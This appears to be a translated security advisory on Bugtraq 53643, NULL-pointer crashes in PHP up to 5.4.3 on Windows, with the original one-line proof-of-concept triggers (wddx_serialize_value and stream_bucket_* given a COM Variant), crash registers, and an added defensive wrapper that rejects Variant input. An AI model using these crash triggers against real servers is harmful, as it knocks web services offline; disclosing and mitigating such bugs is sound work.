Release date:
Updated on:
Affected Systems:
PHP 5.4.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53643
PHP is a server-side scripting language embedded in HTML documents, comparable to Microsoft's ASP. Its syntax resembles C and it is widely used by web developers.
PHP versions earlier than 5.4.3 contain multiple denial-of-service vulnerabilities caused by NULL pointer dereferences. An attacker can trigger them to crash the application.
<* Source: condis *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
<?php
/*
PHP <= 5.4.3 wddx_serialize_* and stream_bucket_* Variant Object Null Ptr Dereference
Author: condis
Date: 10.04.2012
Web: http://cond.psychodela.pl
----
Download: http://php.net/downloads.php
Tested on:
PHP 5.3.8  + Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0  + Windows XP SP3 Professional PL
PHP 5.4.3  + Windows XP SP3 Professional PL
Description:
wddx_serialize_value and wddx_serialize_vars functions fail to handle a Variant
object when it is given as the first argument.
Registers:
EAX 00000000
ECX 1056AAE8 php5ts.1056AAE8
EDX 100EFCE0 php5ts.100EFCE0
EBX 01032AB0
ESP 00C0FAE0
EBP 00000000
ESI 0121E478
EDI 0121CB50
EIP 1028F22E php5ts.1028F22E
Crash:
1028F22E 8A45 25   mov al, byte ptr ss:[ebp+25]
The situation looks pretty much the same for both wddx_serialize_vars and
wddx_serialize_value. The functions stream_bucket_prepend and stream_bucket_append
also have problems handling a Variant object given as the second argument:
stream_bucket_append(1, new Variant(1));
stream_bucket_prepend(1, new Variant(1));
PS: The Variant object is only available in PHP for Windows and was implemented
in PHP > 4.1.0 and PHP 5.
For more details check: http://php.net/manual/en/class.variant.php
PS2: After running this via the webserver my Apache wasn't able to handle requests
anymore and I had to restart it :)
Kthxbye
*/
// Trigger: the WDDX serializer dereferences a NULL pointer (EBP = 0 above)
// when handed a COM Variant object instead of a plain PHP value. Windows only.
wddx_serialize_value(new Variant(666));
?>
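A defensive wrapper for the affected wddx_serialize_value() call, added here as an illustration; it is not part of the advisory above nor of PHP itself. It assumes the wddx extension is loaded and that the Windows-only 'variant' class is the only type that needs to be refused.

```php
<?php
// Added example (not from the advisory or from PHP): refuse COM Variant input
// before it reaches the crashing extension code, as a stop-gap until a fixed
// PHP build is deployed. Assumption: only the 'variant' class must be rejected.

/**
 * Recursively check whether $value is, or contains, a COM Variant object.
 * instanceof against a class that is not loaded (non-Windows builds) is false.
 */
function contains_variant($value, $depth = 0)
{
    if ($depth > 64) {          // guard against pathological nesting
        return true;            // treat as unsafe rather than recurse forever
    }
    if (is_object($value)) {
        if (class_exists('variant', false) && $value instanceof variant) {
            return true;
        }
        $value = get_object_vars($value);   // inspect public properties too
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_variant($item, $depth + 1)) {
                return true;
            }
        }
    }
    return false;
}

/**
 * Drop-in replacement for wddx_serialize_value() that rejects Variant input
 * instead of handing it to the affected extension.
 */
function safe_wddx_serialize_value($value, $comment = null)
{
    if (contains_variant($value)) {
        throw new InvalidArgumentException('COM Variant objects cannot be WDDX-serialised');
    }
    return $comment === null
        ? wddx_serialize_value($value)
        : wddx_serialize_value($value, $comment);
}

// Usage: a plain array serialises normally; a Variant (Windows only) is rejected.
echo safe_wddx_serialize_value(array('id' => 666, 'name' => 'demo')), "\n";
if (class_exists('variant', false)) {       // Variant only exists on Windows builds
    try {
        safe_wddx_serialize_value(new Variant(666));
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```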
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PHP
---
Currently, the vendor has not released a patch or upgrade. Users of the software are advised to watch the vendor's homepage for the latest version:
http://www.php.net